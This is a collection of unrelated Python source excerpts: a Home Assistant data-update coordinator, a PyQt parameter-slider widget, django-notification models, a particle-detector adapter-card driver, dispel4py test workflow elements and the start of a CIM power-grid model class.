request_refresh_debouncer: Debouncer | None = None,
):
"""Initialize global data updater."""
self.hass = hass
self.logger = logger
self.name = name
self.update_method = update_method
self.update_interval = update_interval
self.data: T | None = None
self._listeners: list[CALLBACK_TYPE] = []
self._job = HassJob(self._handle_refresh_interval)
self._unsub_refresh: CALLBACK_TYPE | None = None
self._request_refresh_task: asyncio.TimerHandle | None = None
self.last_update_success = True
self.last_exception: Exception | None = None
if request_refresh_debouncer is None:
request_refresh_debouncer = Debouncer(
hass,
logger,
cooldown=REQUEST_REFRESH_DEFAULT_COOLDOWN,
immediate=REQUEST_REFRESH_DEFAULT_IMMEDIATE,
function=self.async_refresh,
)
else:
request_refresh_debouncer.function = self.async_refresh
self._debounced_refresh = request_refresh_debouncer
self.hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_STOP, self._async_stop_refresh
)
@callback
def async_add_listener(self, update_callback: CALLBACK_TYPE) -> Callable[[], None]:
"""Listen for data updates."""
schedule_refresh = not self._listeners
self._listeners.append(update_callback)
# This is the first listener, set up interval.
if schedule_refresh:
self._schedule_refresh()
@callback
def remove_listener() -> None:
"""Remove update listener."""
self.async_remove_listener(update_callback)
return remove_listener
@callback
def async_remove_listener(self, update_callback: CALLBACK_TYPE) -> None:
"""Remove data update."""
self._listeners.remove(update_callback)
if not self._listeners and self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
@callback
def _schedule_refresh(self) -> None:
"""Schedule a refresh."""
if self.update_interval is None:
return
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
# We _floor_ utcnow to create a schedule on a rounded second,
# minimizing the time between the point and the real activation.
# That way we obtain a constant update frequency,
# as long as the update process takes less than a second
self._unsub_refresh = event.async_track_point_in_utc_time(
self.hass,
self._job,
utcnow().replace(microsecond=0) + self.update_interval,
)
async def _handle_refresh_interval(self, _now: datetime) -> None:
"""Handle a refresh interval occurrence."""
self._unsub_refresh = None
await self.async_refresh()
async def async_request_refresh(self) -> None:
"""Request a refresh.
Refresh will wait a bit to see if it can batch them.
"""
await self._debounced_refresh.async_call()
async def _async_update_data(self) -> T | None:
"""Fetch the latest data from the source."""
if self.update_method is None:
raise NotImplementedError("Update method not implemented")
return await self.update_method()
async def async_config_entry_first_refresh(self) -> None:
"""Refresh data for the first time when a config entry is setup.
Will automatically raise ConfigEntryNotReady if the refresh
fails. Additionally logging is handled by config entry setup
to ensure that multiple retries do not cause log spam.
"""
await self._async_refresh(log_failures=False)
if self.last_update_success:
return
ex = ConfigEntryNotReady()
ex.__cause__ = self.last_exception
raise ex
async def async_refresh(self) -> None:
"""Refresh data and log errors."""
await self._async_refresh(log_failures=True)
async def _async_refresh(self, log_failures: bool = True) -> None:
"""Refresh data."""
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
self._debounced_refresh.async_cancel()
start = monotonic()
try:
self.data = await self._async_update_data()
except (asyncio.TimeoutError, requests.exceptions.Timeout) as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
self.logger.error("Timeout fetching %s data", self.name)
self.last_update_success = False
except (aiohttp.ClientError, requests.exceptions.RequestException) as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
self.logger.error("Error requesting %s data: %s", self.name, err)
self.last_update_success = False
except urllib.error.URLError as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
if err.reason == "timed out":
self.logger.error("Timeout fetching %s data", self.name)
else:
self.logger.error(
"Error requesting %s data: %s", self.name, err
)
self.last_update_success = False
except UpdateFailed as err:
self.last_exception = err
if self.last_update_success:
if log_failures:
self.logger.error("Error fetching %s data: %s", self.name, err)
self.last_update_success = False
except NotImplementedError as err:
self.last_exception = err
raise err
except Exception as err: # pylint: disable=broad-except
self.last_exception = err
self.last_update_success = False
if log_failures:
self.logger.exception(
"Unexpected error fetching %s data: %s", self.name, err
)
else:
if not self.last_update_success:
self.last_update_success = True
self.logger.info("Fetching %s data recovered", self.name)
finally:
self.logger.debug(
"Finished fetching %s data in %.3f seconds",
self.name,
monotonic() - start,
)
if self._listeners:
self._schedule_refresh()
for update_callback in self._listeners:
update_callback()
@callback
def async_set_updated_data(self, data: T) -> None:
"""Manually update data, notify listeners and reset refresh interval."""
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
self._debounced_refresh.async_cancel()
self.data = data
self.last_update_success = True
self.logger.debug(
"Manually updated %s data",
self.name,
)
if self._listeners:
self._schedule_refresh()
for update_callback in self._listeners:
update_callback()
@callback
def _async_stop_refresh(self, _: Event) -> None:
"""Stop refreshing when Home Assistant is stopping."""
self.update_interval = None
if self._unsub_refresh:
self._unsub_refresh()
self._unsub_refresh = None
class CoordinatorEntity(entity.Entity):
"""A class for entities using DataUpdateCoordinator."""
def __init__(self, coordinator: DataUpdateCoordinator[Any]) -> None:
"""Create the entity with a DataUpdateCoordinator."""
self.coordinator = coordinator
@property
def should_poll(self) -> bool:
"""No need to poll. Coordinator notifies entity of updates."""
return False
@property
def available(self) -> bool:
"""Return if entity is available."""
return self.coordinator.last_update_success
async def async_added_to_hass(self) -> None:
"""When entity is added to hass."""
await super().async_added_to_hass()
self.async_on_remove(
self.coordinator.async_add_listener(self._handle_coordinator_update)
)
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
self.async_write_ha_state()
async def async_update(self) -> None:
"""Update the entity.
Only used by the generic entity update service.
"""
# Ignore manual update requests if the entity is disabled
if not self.enabled:
return
await self.coordinator.async_request_refresh()
|
|
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import pytc
import inspect, math
class Sliders(QWidget):
"""
create sliders for an experiment
"""
def __init__(self, param_name, parent):
super().__init__()
self._exp = parent._exp
self._param_name = param_name
self._fitter = parent._fitter
self._fit_run = False
self._main_box = parent._main_box
self._plot_frame = parent._plot_frame
self.layout()
@property
def name(self):
"""
"""
return self._param_name
def layout(self):
"""
"""
self._main_layout = QGridLayout(self)
self._main_layout.setVerticalSpacing(40)
self._name_label = QLabel(self._param_name, self)
self._main_layout.addWidget(self._name_label, 0, 0, 0, 2)
self._fix = QCheckBox("Fix?", self)
self._fix.toggle()
self._fix.setChecked(False)
self._fix.stateChanged.connect(self.fix_layout)
self._main_layout.addWidget(self._fix, 1, 0)
self._slider = QSlider(Qt.Horizontal)
self._slider.sliderReleased.connect(self.update_val)
self._main_layout.addWidget(self._slider, 1, 1)
self._slider.setMinimumWidth(100)
self._param_guess_label = QLabel("", self)
self._main_layout.addWidget(self._param_guess_label, 1, 2)
self.bounds()
self._fix_int = QLineEdit(self)
self._main_layout.addWidget(self._fix_int, 1, 3)
self._fix_int.setText(str(1))
self._fix_int.returnPressed.connect(self.fix)
self._fix_int.hide()
self._update_min_label = QLabel("min: ", self)
self._main_layout.addWidget(self._update_min_label, 1, 4)
self._update_min = QLineEdit(self)
self._main_layout.addWidget(self._update_min, 1, 5)
self._update_min.returnPressed.connect(self.min_bounds)
self._update_min.setFixedWidth(60)
self._update_max_label = QLabel("max: ", self)
self._main_layout.addWidget(self._update_max_label, 1, 6)
self._update_max = QLineEdit(self)
self._main_layout.addWidget(self._update_max, 1, 7)
self._update_max.returnPressed.connect(self.max_bounds)
self._update_max.setFixedWidth(60)
@pyqtSlot()
def set_fit_true(self):
"""
"""
self._fit_run = True
def check_if_fit(self):
"""
if a fit has been run, and a slider is changed, change all parameters back to guesses in slider widgets
"""
if self._fit_run:
self._fitter.guess_to_value()
self._fit_run = False
self._plot_frame.update()
def fix_layout(self, state):
"""
initial parameter fix and updating whether slider/fixed int is hidden or shown
"""
if state == Qt.Checked:
# change widget views
self._fix_int.show()
self._slider.hide()
self._param_guess_label.hide()
self._fitter.update_fixed(self._param_name, int(self._fix_int.text()), self._exp)
self.check_if_fit()
else:
#change widget views
self._fix_int.hide()
self._slider.show()
self._param_guess_label.show()
self._fitter.update_fixed(self._param_name, None, self._exp)
def fix(self):
"""
update fixed value when enter/return key pressed
"""
try:
self._fitter.update_fixed(self._param_name, int(self._fix_int.text()), self._exp)
self.check_if_fit()
except:
pass
def update_val(self):
"""
update value for parameter based on slider value
"""
value = int(self._slider.value())
# transform values back
if self._range_diff < 10:
value /= 10
elif self._range_diff < 100000:
value *= 100
elif self._range_diff < 100000000:
value = 10 ** value
if value != 0:
# if guess update, update parameter as well for plot
self._fitter.update_guess(self._param_name, value, self._exp)
self._fitter.update_value(self._param_name, value, self._exp)
self._param_guess_label.setText(str(value))
else:
pass
self.check_if_fit()
def transform_init(self, val):
"""
transform values for use in slider
"""
if self._range_diff < 10:
new_val = val * 10
elif self._range_diff < 100000:
new_val = val / 100
elif self._range_diff < 100000000:
new_val = math.log10(val)
return new_val
def min_bounds(self):
"""
update the minimum bounds when enter/return key pressed
"""
try:
self._min = int(self._update_min.text())
# make sure K min bound isn't negative
if "K" in self._param_name and self._min < 0:
self._min = 1
# set new range
self._range_diff = self._max - self._min
# if range has significantly changed, update value transformations
self._slider_max = self.transform_init(self._max)
self._slider_min = self.transform_init(self._min)
# set slider min
self._slider.setMinimum(self._slider_min)
self.update_bounds()
except:
pass
def max_bounds(self):
"""
update maximum bounds when enter/return key pressed
"""
try:
self._max = int(self._update_max.text())
# set new range
self._range_diff = self._max - self._min
# if range has significantly changed, update the value transformations
self._slider_max = self.transform_init(self._max)
self._slider_min = self.transform_init(self._min)
# set slider max
self._slider.setMaximum(self._slider_max)
self.update_bounds()
except:
pass
def bounds(self):
"""
for anything specific to child class
"""
# transform values based on parameter to allow floats to pass to fitter and
# make sliders easier to use, QtSlider only allows integers
self._range_diff = self._max - self._min
min_range = self.transform_init(self._min)
max_range = self.transform_init(self._max)
self._slider.setMinimum(min_range)
self._slider.setMaximum(max_range)
def update_bounds(self):
"""
update min/max bounds and check if range needs to be updated as well
"""
pass
|
|
from __future__ import unicode_literals
from __future__ import print_function
import base64
from django.db import models
from django.db.models.query import QuerySet
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import get_language, activate
from django.utils.encoding import python_2_unicode_compatible
from django.utils.six.moves import cPickle as pickle # pylint: disable-msg=F
from .compat import AUTH_USER_MODEL
from notification import backends
DEFAULT_QUEUE_ALL = False
QUEUE_ALL = getattr(settings, "NOTIFICATION_QUEUE_ALL", DEFAULT_QUEUE_ALL)
NOTIFICATION_BACKENDS = backends.load_backends()
NOTICE_MEDIA, NOTICE_MEDIA_DEFAULTS = backends.load_media_defaults(
backends=NOTIFICATION_BACKENDS
)
class LanguageStoreNotAvailable(Exception):
pass
def create_notice_type(label, display, description, **kwargs):
NoticeType.create(label, display, description, **kwargs)
@python_2_unicode_compatible
class NoticeType(models.Model):
label = models.CharField(_("label"), max_length=40)
display = models.CharField(_("display"), max_length=50)
description = models.CharField(_("description"), max_length=100)
# by default only on for media with sensitivity less than or equal to this number
default = models.IntegerField(_("default"))
def __str__(self):
return self.label
class Meta:
verbose_name = _("notice type")
verbose_name_plural = _("notice types")
@classmethod
def create(cls, label, display, description, default=2, verbosity=1):
"""
Creates a new NoticeType.
This is intended to be used by other apps as a post_syncdb manangement step.
"""
try:
notice_type = cls._default_manager.get(label=label)
updated = False
if display != notice_type.display:
notice_type.display = display
updated = True
if description != notice_type.description:
notice_type.description = description
updated = True
if default != notice_type.default:
notice_type.default = default
updated = True
if updated:
notice_type.save()
if verbosity > 1:
print("Updated %s NoticeType" % label)
except cls.DoesNotExist:
cls(label=label, display=display, description=description, default=default).save()
if verbosity > 1:
print("Created %s NoticeType" % label)
class NoticeSetting(models.Model):
"""
Indicates, for a given user, whether to send notifications
of a given type to a given medium.
"""
user = models.ForeignKey(AUTH_USER_MODEL, verbose_name=_("user"))
notice_type = models.ForeignKey(NoticeType, verbose_name=_("notice type"))
medium = models.CharField(_("medium"), max_length=1, choices=NOTICE_MEDIA)
send = models.BooleanField(_("send"))
class Meta:
verbose_name = _("notice setting")
verbose_name_plural = _("notice settings")
unique_together = ("user", "notice_type", "medium")
@classmethod
def for_user(cls, user, notice_type, medium):
try:
return cls._default_manager.get(user=user, notice_type=notice_type, medium=medium)
except cls.DoesNotExist:
default = (NOTICE_MEDIA_DEFAULTS[medium] <= notice_type.default)
setting = cls(user=user, notice_type=notice_type, medium=medium, send=default)
setting.save()
return setting
class NoticeQueueBatch(models.Model):
"""
A queued notice.
Denormalized data for a notice.
"""
pickled_data = models.TextField()
def get_notification_language(user):
"""
Returns site-specific notification language for this user. Raises
LanguageStoreNotAvailable if this site does not use translated
notifications.
"""
if getattr(settings, "NOTIFICATION_LANGUAGE_MODULE", False):
try:
app_label, model_name = settings.NOTIFICATION_LANGUAGE_MODULE.split(".")
model = models.get_model(app_label, model_name)
# pylint: disable-msg=W0212
language_model = model._default_manager.get(user__id__exact=user.id)
if hasattr(language_model, "language"):
return language_model.language
except (ImportError, ImproperlyConfigured, model.DoesNotExist):
raise LanguageStoreNotAvailable
raise LanguageStoreNotAvailable
def send_now(users, label, extra_context=None, sender=None):
"""
Creates a new notice.
This is intended to be how other apps create new notices.
notification.send(user, "friends_invite_sent", {
"spam": "eggs",
"foo": "bar",
)
"""
sent = False
if extra_context is None:
extra_context = {}
notice_type = NoticeType.objects.get(label=label)
current_language = get_language()
for user in users:
# get user language for user from language store defined in
# NOTIFICATION_LANGUAGE_MODULE setting
try:
language = get_notification_language(user)
except LanguageStoreNotAvailable:
language = None
if language is not None:
# activate the user's language
activate(language)
for backend in NOTIFICATION_BACKENDS.values():
if backend.can_send(user, notice_type):
backend.deliver(user, sender, notice_type, extra_context)
sent = True
# reset environment to original language
activate(current_language)
return sent
def send(*args, **kwargs):
"""
A basic interface around both queue and send_now. This honors a global
flag NOTIFICATION_QUEUE_ALL that helps determine whether all calls should
be queued or not. A per call ``queue`` or ``now`` keyword argument can be
used to always override the default global behavior.
"""
queue_flag = kwargs.pop("queue", False)
now_flag = kwargs.pop("now", False)
assert not (queue_flag and now_flag), "'queue' and 'now' cannot both be True."
if queue_flag:
return queue(*args, **kwargs)
elif now_flag:
return send_now(*args, **kwargs)
else:
if QUEUE_ALL:
return queue(*args, **kwargs)
else:
return send_now(*args, **kwargs)
def queue(users, label, extra_context=None, sender=None):
"""
Queue the notification in NoticeQueueBatch. This allows for large amounts
of user notifications to be deferred to a seperate process running outside
the webserver.
"""
if extra_context is None:
extra_context = {}
if isinstance(users, QuerySet):
users = [row["pk"] for row in users.values("pk")]
else:
users = [user.pk for user in users]
notices = []
for user in users:
notices.append((user, label, extra_context, sender))
NoticeQueueBatch(pickled_data=base64.b64encode(pickle.dumps(notices))).save()
|
|
#
# ------------------------------------------------------------
# Copyright (c) All rights reserved
# SiLab, Institute of Physics, University of Bonn
# ------------------------------------------------------------
#
import logging
from struct import pack, unpack_from, calcsize
from array import array
from collections import OrderedDict
from math import log
import string
from basil.HL.HardwareLayer import HardwareLayer
from basil.HL.FEI4AdapterCard import AdcMax1239, Eeprom24Lc128, Fei4Dcs
class DacMax5380(HardwareLayer):
'''DAC MAX5380
Write current limit (QMAC).
'''
MAX_5380_ADD = 0x60
def __init__(self, intf, conf):
super(DacMax5380, self).__init__(intf, conf)
self._base_addr = conf['base_addr']
def _set_dac_value(self, channel, value):
'''Write DAC
'''
self._intf.write(self._base_addr + self.MAX_5380_ADD, array('B', pack('B', value)))
class DacDs4424(HardwareLayer):
'''DAC DS4424
Write voltage (QMAC).
'''
DS_4424_ADD = 0x20
def __init__(self, intf, conf):
super(DacDs4424, self).__init__(intf, conf)
self._base_addr = conf['base_addr']
def _set_dac_value(self, channel, value):
'''Write DAC
'''
# DAC value cannot be -128
if value == -128:
value = -127
if value < 0:
sign = 1
else:
sign = 0
value = (sign << 7) | (0x7F & abs(value))
self._intf.write(self._base_addr + self.DS_4424_ADD, array('B', pack('BB', channel, value)))
class FEI4QuadModuleAdapterCard(AdcMax1239, DacDs4424, DacMax5380, Eeprom24Lc128, Fei4Dcs):
'''FEI4 Quad Module Adapter Card interface
'''
# EEPROM data V2
HEADER_V2 = 0xa102
CAL_DATA_CH_V2_FORMAT = '8sddddddddddddddd'
CAL_DATA_ADDR = Fei4Dcs.ID_ADDR + calcsize(Fei4Dcs.ID_FORMAT)
CAL_DATA_V2_FORMAT = '<' + 4 * CAL_DATA_CH_V2_FORMAT
# NTC
T_KELVIN_0 = 273.15
T_KELVIN_25 = (25.0 + T_KELVIN_0)
# Channel mappings
_ch_map = {
'CH1':
{'DACV': {'channel': 0xf8},
'ADCV': {'channel': 0},
'ADCI': {'channel': 1},
'NTC': {'channel': 8}
},
'CH2':
{'DACV': {'channel': 0xf9},
'ADCV': {'channel': 2},
'ADCI': {'channel': 3},
'NTC': {'channel': 9}
},
'CH3':
{'DACV': {'channel': 0xfa},
'ADCV': {'channel': 4},
'ADCI': {'channel': 5},
'NTC': {'channel': 10}
},
'CH4':
{'DACV': {'channel': 0xfb},
'ADCV': {'channel': 6},
'ADCI': {'channel': 7},
'NTC': {'channel': 11}
}
}
def __init__(self, intf, conf):
super(FEI4QuadModuleAdapterCard, self).__init__(intf, conf)
# Channel calibrations
self._ch_cal = OrderedDict([
('CH1',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
}),
('CH2',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
}),
('CH3',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
}),
('CH4',
{'name': '',
'default': 0.0,
'DACV': {'offset': 1.8, 'gain': 0.00397},
'ADCV': {'offset': 0.0, 'gain': 1000.0},
'DACI': {'offset': 0.0, 'gain': 0.0078125},
'ADCI': {'offset': 0.0, 'gain': 1000.0, 'iq_offset': 1.5, 'iq_gain': 7.0},
'NTC': {'B_NTC': 3425.0, 'R_NTC_25': 10000.0, 'R1': 39200.0, 'R2': 4750.0, 'R4': 10000.0, 'VREF': 4.5}
})]
)
def init(self):
self._setup_adc(self.SETUP_FLAGS_BI)
self.read_eeprom_calibration()
self.set_current_limit('CH1', 1.0)
logging.info('Found adapter card: {}'.format('%s with ID %s' % ('Quad Module Adapter Card', self.get_id())))
def read_eeprom_calibration(self, temperature=False): # use default values for temperature, EEPROM values are usually not calibrated and random
'''Reading EEPROM calibration for power regulators and temperature
'''
header = self.get_format()
if header == self.HEADER_V2:
data = self._read_eeprom(self.CAL_DATA_ADDR, size=calcsize(self.CAL_DATA_V2_FORMAT))
for idx, channel in enumerate(self._ch_cal.iterkeys()):
ch_data = data[idx * calcsize(self.CAL_DATA_CH_V2_FORMAT):(idx + 1) * calcsize(self.CAL_DATA_CH_V2_FORMAT)]
values = unpack_from(self.CAL_DATA_CH_V2_FORMAT, ch_data)
self._ch_cal[channel]['name'] = "".join([c for c in values[0] if (c in string.printable)]) # values[0].strip()
self._ch_cal[channel]['default'] = values[1]
self._ch_cal[channel]['ADCI']['gain'] = values[2]
self._ch_cal[channel]['ADCI']['offset'] = values[3]
self._ch_cal[channel]['ADCI']['iq_gain'] = values[4]
self._ch_cal[channel]['ADCI']['iq_offset'] = values[5]
self._ch_cal[channel]['ADCV']['gain'] = values[6]
self._ch_cal[channel]['ADCV']['offset'] = values[7]
self._ch_cal[channel]['DACV']['gain'] = values[8]
self._ch_cal[channel]['DACV']['offset'] = values[9]
if temperature:
self._ch_cal[channel]['NTC']['B_NTC'] = values[10]
self._ch_cal[channel]['NTC']['R1'] = values[11]
self._ch_cal[channel]['NTC']['R2'] = values[12]
self._ch_cal[channel]['NTC']['R4'] = values[13]
self._ch_cal[channel]['NTC']['R_NTC_25'] = values[14]
self._ch_cal[channel]['NTC']['VREF'] = values[15]
else:
raise ValueError('EEPROM data format not supported (header: %s)' % header)
def get_temperature(self, channel):
'''Reading temperature
'''
# NTC type SEMITEC 103KT1608 http://www.semitec.co.jp/english/products/pdf/KT_Thermistor.pdf
#
# R_NTC = R_25 * exp(B_NTC * (1/T - 1/T_25))
#
# R_NTC measured NTC resistance
# R_NTC_25 resistance @ 25C
# B_NTC temperature coefficient
# Temperature current temperature (Kelvin)
# T_25 298,15 K (25C)
#
# B_NTC NTC 'b' coefficient, NTC Semitec 103KT1608-1P
# R_NTC_25 NTC 25C resistance, NTC Semitec 103KT1608-1P
# R1 resistor value for NTC voltage divider
# R2 value of R2 in the reference voltage divider
# R4 value of R4 in the reference voltage divider
# VREF supply voltage of the resistor bridge
#
# Note:
# new NTC on FE-I4
# NTC type TDK NTCG163JF103FT1
#
kwargs = self._ch_map[channel]['NTC']
temp_raw = self._get_adc_value(**kwargs)
v_adc = ((temp_raw - self._ch_cal[channel]['ADCV']['offset']) / self._ch_cal[channel]['ADCV']['gain']) # voltage, VDDA1
k = self._ch_cal[channel]['NTC']['R4'] / (self._ch_cal[channel]['NTC']['R2'] + self._ch_cal[channel]['NTC']['R4']) # reference voltage divider
r_ntc = self._ch_cal[channel]['NTC']['R1'] * (k - v_adc / self._ch_cal[channel]['NTC']['VREF']) / (1 - k + v_adc / self._ch_cal[channel]['NTC']['VREF']) # NTC resistance
return (self._ch_cal[channel]['NTC']['B_NTC'] * self.T_KELVIN_25) / (self._ch_cal[channel]['NTC']['B_NTC'] + self.T_KELVIN_25 * log(r_ntc / self._ch_cal[channel]['NTC']['R_NTC_25'])) - self.T_KELVIN_0 # NTC temperature
def set_current_limit(self, channel, value, unit='A'):
'''Setting current limit
Note: same limit for all channels.
'''
dac_offset = self._ch_cal[channel]['DACI']['offset']
dac_gain = self._ch_cal[channel]['DACI']['gain']
if unit == 'raw':
value = value
elif unit == 'A':
value = int((value - dac_offset) / dac_gain)
elif unit == 'mA':
value = int((value / 1000 - dac_offset) / dac_gain)
else:
raise TypeError("Invalid unit type.")
DacMax5380._set_dac_value(self, channel, value)
|
|
# Copyright (c) The University of Edinburgh 2014
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Test PEs
'''
Example PEs for test workflows, implementing various patterns.
'''
from dispel4py.core import GenericPE
from dispel4py.base import IterativePE, ProducerPE, ConsumerPE
import random
import time
from collections import defaultdict
class TestProducer(GenericPE):
'''
This PE produces a range of numbers
'''
def __init__(self, numOutputs=1):
GenericPE.__init__(self)
if numOutputs == 1:
self._add_output('output', tuple_type=['number'])
else:
for i in range(numOutputs):
self._add_output('output%s' % i, tuple_type=['number'])
self.counter = 0
self.outputnames = list(self.outputconnections.keys())
def _process(self, inputs):
self.counter += 1
result = {}
for output in self.outputnames:
result[output] = self.counter
# self.log("Writing out %s" % result)
return result
class NumberProducer(GenericPE):
def __init__(self, numIterations=1):
GenericPE.__init__(self)
self._add_output('output', tuple_type=['number'])
self.counter = 0
self.numIterations = numIterations
def _process(self, inputs):
for i in range(self.numIterations):
self.write('output', [self.counter*i+i])
self.counter += 1
class IntegerProducer(ProducerPE):
def __init__(self, start, limit):
ProducerPE.__init__(self)
self.start = start
self.limit = limit
def _process(self, inputs):
for i in range(self.start, self.limit):
self.write('output', i)
class TestOneInOneOut(GenericPE):
'''
This PE outputs the input data.
'''
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output')
def setInputTypes(self, inputtypes):
self.inputconnections['input']['type'] = inputtypes['input']
self.outputconnections['output']['type'] = inputtypes['input']
def process(self, inputs):
# self.log('Processing inputs %s' % inputs)
return {'output': inputs['input']}
class TestIterative(IterativePE):
'''
This PE outputs the input data.
'''
def __init__(self):
IterativePE.__init__(self)
def _process(self, data):
return data
class TestDelayOneInOneOut(GenericPE):
'''
This PE outputs the input data.
'''
def __init__(self, delay=1):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output', tuple_type=['number'])
self.delay = delay
def process(self, inputs):
# self.log('Processing inputs %s' % inputs)
time.sleep(self.delay)
return {'output': inputs['input']}
class TestOneInOneOutWriter(GenericPE):
'''
This PE copies the input to an output, but it uses the write method.
Remember that the write function allows to produce more than one output
block within one processing step.
'''
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output', tuple_type=['number'])
def process(self, inputs):
self.write('output', inputs['input'])
class TestTwoInOneOut(GenericPE):
'''
This PE takes two inputs and it merges the data into one output string.
'''
def __init__(self):
GenericPE.__init__(self)
self._add_input('input0')
self._add_input('input1')
self._add_output('output', tuple_type=['result'])
def process(self, inputs):
# print '%s: inputs %s' % (self.id, inputs)
result = ''
for inp in self.inputconnections:
if inp in inputs:
result += '%s' % (inputs[inp])
if result:
# print '%s: result %s' % (self.id, result)
return {'output': result}
class TestMultiProducer(GenericPE):
def __init__(self, num_output=10):
GenericPE.__init__(self)
self._add_output('output')
self.num_output = num_output
def _process(self, inputs):
for i in range(self.num_output):
self.write('output', i)
class PrintDataConsumer(ConsumerPE):
def __init__(self):
ConsumerPE.__init__(self)
def _process(self, data):
print(data)
class RandomFilter(GenericPE):
'''
This PE randomly filters the input.
'''
input_name = 'input'
output_name = 'output'
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output', tuple_type=['word'])
def process(self, inputs):
if random.choice([True, False]):
return {'output': inputs['input']}
# self.write('output', inputs['input'] )
return None
class WordCounter(GenericPE):
'''
This PE counts the number of times (counter) that it receives each word.
And it produces as an output: the same word (the input) and its counter.
'''
input_name = 'input'
output_name = 'output'
def __init__(self):
GenericPE.__init__(self)
self._add_input('input', grouping=[0])
self._add_output('output', tuple_type=['word', 'count'])
self.mywords = defaultdict(int)
def _process(self, inputs):
word = inputs['input'][0]
self.mywords[word] += 1
return {'output': [word, self.mywords[word]]}
class RandomWordProducer(GenericPE):
'''
This PE produces a random word as an output.
'''
words = ["dispel4py", "computing", "mpi", "processing",
"simple", "analysis", "data"]
def __init__(self):
GenericPE.__init__(self)
self._add_output('output', tuple_type=['word'])
def process(self, inputs=None):
word = random.choice(RandomWordProducer.words)
outputs = {'output': [word]}
return outputs
|
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM15.IEC61970.Core.IdentifiedObject import IdentifiedObject
class DesignLocationCU(IdentifiedObject):
"""Compatible unit at a given design location.Compatible unit at a given design location.
"""
def __init__(self, energizationFlag=False, cuUsage='', removalDate='', cuAction="install", cuAccount='', cuQuantity="", ConditionFactors=None, CompatibleUnits=None, WorkTasks=None, Designs=None, CUGroups=None, DesignLocation=None, status=None, *args, **kw_args):
"""Initialises a new 'DesignLocationCU' instance.
@param energizationFlag: True if associated electrical equipment is intended to be energized while work is being performed.
@param cuUsage: As the same CU can be used for different purposes and accounting purposes, usage must be specified. Examples include: distribution, transmission, substation.
@param removalDate: Year when a CU that represents an asset is removed.
@param cuAction: A code that instructs the crew what action to perform. Values are: "install", "remove", "transfer", "abandon"
@param cuAccount: A code that helps direct accounting (capital, expense, or accounting treatment).
@param cuQuantity: The quantity of the CU being assigned to this location.
@param ConditionFactors:
@param CompatibleUnits:
@param WorkTasks:
@param Designs:
@param CUGroups:
@param DesignLocation:
@param status:
"""
#: True if associated electrical equipment is intended to be energized while work is being performed.
self.energizationFlag = energizationFlag
#: As the same CU can be used for different purposes and accounting purposes, usage must be specified. Examples include: distribution, transmission, substation.
self.cuUsage = cuUsage
#: Year when a CU that represents an asset is removed.
self.removalDate = removalDate
#: A code that instructs the crew what action to perform. Values are: "install", "remove", "transfer", "abandon"
self.cuAction = cuAction
#: A code that helps direct accounting (capital, expense, or accounting treatment).
self.cuAccount = cuAccount
